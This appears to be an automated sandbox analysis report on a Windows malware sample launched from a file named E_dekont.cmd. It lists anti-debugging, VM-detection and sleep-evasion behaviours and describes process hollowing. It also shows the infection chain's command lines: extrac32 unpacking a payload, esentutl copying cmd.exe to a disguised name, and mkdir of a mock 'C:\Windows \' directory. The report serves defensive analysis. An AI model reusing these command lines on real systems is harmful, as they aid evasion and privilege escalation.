Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Found evasive API chain checking for process token information

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\FXSSVC.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\Public\alpha.pif	API coverage: 6.3 %
Source: C:\Users\Public\alpha.pif	API coverage: 7.9 %
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	API coverage: 9.7 %
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	API coverage: 8.9 %
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	API coverage: 9.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 4784	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 4468	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 6772	Thread sleep count: 5124 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 6772	Thread sleep count: 4310 > 30	Jump to behavior
Source: C:\Windows\System32\alg.exe TID: 4520	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6164	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe TID: 3148	Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5240	Thread sleep time: -260000s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 2668	Thread sleep count: 484 > 30
Source: C:\Windows\System32\msdtc.exe TID: 2668	Thread sleep time: -48400s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 2944	Thread sleep time: -250000s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5912	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\xpha.pif	Last function: Thread delayed

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	4_2_02AF5908
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	13_2_00020207
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	13_2_0002589A
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,	13_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	13_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	13_2_0001532E
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	17_2_0002589A
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	17_2_00020207
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,	17_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	17_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	17_2_0001532E

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\alg.exe	Thread delayed: delay time: 60000
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Thread delayed: delay time: 60000
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @Y2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: Jwsmvmdw.PIF, 0000001B.00000002.1662054093.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>>a9
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wvid.infvid.devicedescMicrosoft Hyper-V Virtualization Infrastructure DriverN
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver4
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverVHD Loopback Contr
Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWr
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00
Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1635254831.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1610304966.00000000005B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen
Source: AppVClient.exe, 00000016.00000003.1594100597.00000000004A0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000002.1595686617.00000000004A1000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.1593875501.0000000000470000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: xpha.pif, 00000012.00000002.1697939115.0000000002EAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter\
Source: Jwsmvmdw.PIF, 00000024.00000002.1753075839.0000000000638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

4_2_02B0F744

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Code function: 12_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

12_1_0040CE09

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

12_1_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B0894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02B0894C

Contains functionality to read the PEB

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0047B594 mov eax, dword ptr fs:[00000030h]	12_1_0047B594
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0003C1FA mov eax, dword ptr fs:[00000030h]	13_2_0003C1FA
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0003C1FA mov eax, dword ptr fs:[00000030h]	17_2_0003C1FA
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_0047B594 mov eax, dword ptr fs:[00000030h]	30_2_0047B594
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10001130 mov eax, dword ptr fs:[00000030h]	30_2_10001130
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10043F3D mov eax, dword ptr fs:[00000030h]	30_2_10043F3D
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_0047B594 mov eax, dword ptr fs:[00000030h]	30_1_0047B594

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Code function: 12_1_0040ADB0 GetProcessHeap,HeapFree,

12_1_0040ADB0

Enables debug privileges

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_1_0040CE09
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_1_0040E61C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_1_00416F6A
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_004123F1 SetUnhandledExceptionFilter,	12_1_004123F1
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00026EC0 SetUnhandledExceptionFilter,	13_2_00026EC0
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00026B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00026B40
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00026EC0 SetUnhandledExceptionFilter,	17_2_00026EC0
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00026B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00026B40
Source: C:\Users\Public\xpha.pif	Code function: 18_2_00893600 SetUnhandledExceptionFilter,	18_2_00893600
Source: C:\Users\Public\xpha.pif	Code function: 18_2_00893470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_00893470
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_2_0040CE09
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_2_0040E61C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_00416F6A
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_004123F1 SetUnhandledExceptionFilter,	30_2_004123F1
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_10041361
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_2_10044C7B
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_1_0040CE09
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_1_0040E61C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_1_00416F6A
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_004123F1 SetUnhandledExceptionFilter,	30_1_004123F1

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQuerySystemInformation: Indirect: 0x9B8462
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtAdjustPrivilegesToken: Indirect: 0x9B864C

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 3FB008	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 2B0008
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 2E2008

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Code function: 30_2_10028550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,

30_2_10028550

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02AF5ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02AFA7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02AF5BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02AFA810
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: GetLocaleInfoA,	12_1_00417A20
Source: C:\Users\Public\alpha.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	13_2_00018572
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	13_2_00016854
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	13_2_00019310
Source: C:\Users\Public\alpha.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	17_2_00018572
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	17_2_00016854
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	17_2_00019310
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	27_2_029B5ACC
